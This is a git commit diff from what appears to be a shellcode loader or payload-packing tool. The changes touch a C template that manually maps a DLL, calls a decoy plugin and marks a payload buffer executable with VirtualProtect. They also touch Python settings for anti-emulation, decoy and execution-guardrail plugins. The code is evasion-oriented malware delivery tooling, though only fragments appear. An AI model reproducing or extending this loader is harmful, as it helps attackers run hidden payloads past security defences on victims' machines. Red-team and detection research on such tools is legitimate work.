fix: templates bug

2026-06-02 17:27:10 +00:00 · 2024-06-17 09:26:05 +02:00
parent b5641214e2
commit 4f36e85563
4 changed files with 6 additions and 8 deletions
@@ -42,9 +42,6 @@ void mymemcpy(void* dest, const void* src, size_t n) {


 DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
-	// get this module's image base address
-	//PVOID imageBase = GetModuleHandleA(NULL);
-
 	// dllBase is expected to be page-aligned
 	if ((DWORD_PTR)dllBase & 0xFFF)
 	{
@@ -55,7 +52,6 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) {
 	PIMAGE_DOS_HEADER dosHeaders = (PIMAGE_DOS_HEADER)dllBase;
 	PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)dllBase + dosHeaders->e_lfanew);
 	SIZE_T dllImageSize = ntHeaders->OptionalHeader.SizeOfImage;
-
 	DWORD_PTR deltaImageBase = (DWORD_PTR)dllBase - (DWORD_PTR)ntHeaders->OptionalHeader.ImageBase;

 /*
@@ -204,7 +200,7 @@ int main()
 	// Call: Decoy plugin
 	decoy();

-	VirtualProtect((LPVOID)dest, 0x7000, PAGE_EXECUTE_READWRITE, &oldProtect);
+	VirtualProtect((LPVOID)dest, {{PAYLOAD_LEN}}, PAGE_EXECUTE_READWRITE, &oldProtect);

 	// FROM supermega_payload[] 
 	// TO dest[]
@@ -1,3 +1,4 @@
 int executionguardrail() {
    // None
+    return 0; // All OK
 }
@@ -35,7 +35,7 @@ class Settings():
        self.generate_shc_from_asm: bool = True

        # More
-        self.fix_missing_iat = False
+        self.fix_missing_iat = True
        self.payload_location = PayloadLocation.DATA

        # directories and filenames
@@ -146,9 +146,10 @@ def start_real(settings: Settings):
        project.settings.decoder_style.value,
        project.settings.carrier_invoke_style.value))

-    logger.info("---[ Plugins: AntiEmulation={}  Decoy={}".format(
+    logger.info("---[ Plugins: AntiEmulation={}  Decoy={}  Guardrail={}".format(
        project.settings.plugin_antiemulation,
-        project.settings.plugin_decoy)
+        project.settings.plugin_decoy,
+        project.settings.plugin_guardrail)
    )

    # FIXUP DLL Payload